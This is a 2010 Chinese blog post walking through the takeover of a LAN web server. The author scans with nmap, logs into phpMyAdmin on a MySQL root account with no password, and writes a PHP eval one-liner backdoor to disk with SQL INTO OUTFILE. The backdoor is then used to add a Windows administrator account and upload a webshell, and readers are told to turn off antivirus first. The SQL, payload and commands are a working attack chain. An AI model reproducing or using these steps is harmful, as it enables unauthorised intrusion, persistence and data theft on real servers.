寻觅生命中的那一片浅草......

每日存档 十月 23rd, 2010

利用phpMyAdmin拿webshell

今天对局域网进行了安全检查

先用nmap对网段进行扫描,看下机器都监听了哪些端口,刚知道nmap可以扫描整个网段

nmap 192.168.16.0/24

恩,有结果了,将结果保存下来,查找那些开了80的,将IP复制到浏览器逐个尝试

终于被我找到一台

浏览器访问
http://192.168.16.19/
允许列目录的

页面底部有服务器信息
Apache/2.2.9 (APMServ) PHP/5.2.6 Server at 192.168.16.19 Port 80

用的是APMserv,应该有phpMyAdmin,自己下载了个APMserv,对比了下目录结构
访问
http://192.168.16.19/phpmyadmin/

成功了,而且MySQL的root帐号没有设置密码,直接登录进去了

这时需要做的是找出网站存放的系统路径,APMserv默认是有phpinfo.php
尝试访问http://192.168.16.19/phpinfo.php
提示没有文件,看来只能另外找办法

回到phpmyadmin,点击“显示 MySQL 的系统变量”

可以看到MySQL的目录:F:\APMServ5.2.6\MySQL5.1\

那phpMyAdmin的目录就是F:\APMServ5.2.6\www\phpMyAdmin\

通过数据库,导出一个PHP文件
随便选个数据库,然后执行以下的sql

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES(‘<?php @eval($_POST[cmd])?>’);
select cmd from a into outfile ‘F:/APMServ5.2.6/www/phpMyAdmin/eval.php’;
Drop TABLE IF EXISTS a;

这是我们的后门
http://192.168.16.19/phpmyadmin/eval.php

加个系统帐号
http://192.168.16.19/phpmyadmin/eval.php?cmd=net user test test /add
将test设置成系统管理员
http://192.168.16.19/phpmyadmin/eval.php?cmd=net localgroup administrators test /add

可惜没有开远程桌面,不能登陆

那不登录,传个webshell上去,下载些文件回来

下载“lanker一句话PHP后门客户端3.0内部版”

注意,杀毒软件会认为lanker一句话PHP后门客户端3.0内部版.htm是病毒,注意先关闭杀毒软件

我们后面地址是http://192.168.16.19/phpmyadmin/eval.php

传test.php上去,访问http://192.168.16.19/phpmyadmin/test.php

这就似乎我们的webshell了

2010年十月
« 9月   11月 »
 123
45678910
11121314151617
18192021222324
25262728293031